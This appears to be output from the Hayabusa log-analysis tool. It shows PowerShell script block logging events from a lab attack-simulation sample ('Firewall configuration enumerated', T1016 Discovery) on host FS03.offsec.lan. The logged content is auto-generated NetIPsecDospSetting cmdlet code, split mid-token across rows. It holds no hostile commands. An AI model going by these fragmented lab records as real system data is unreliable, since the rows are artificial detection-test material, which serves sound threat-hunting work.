[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.082 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,")')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $fa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.082 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lse if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 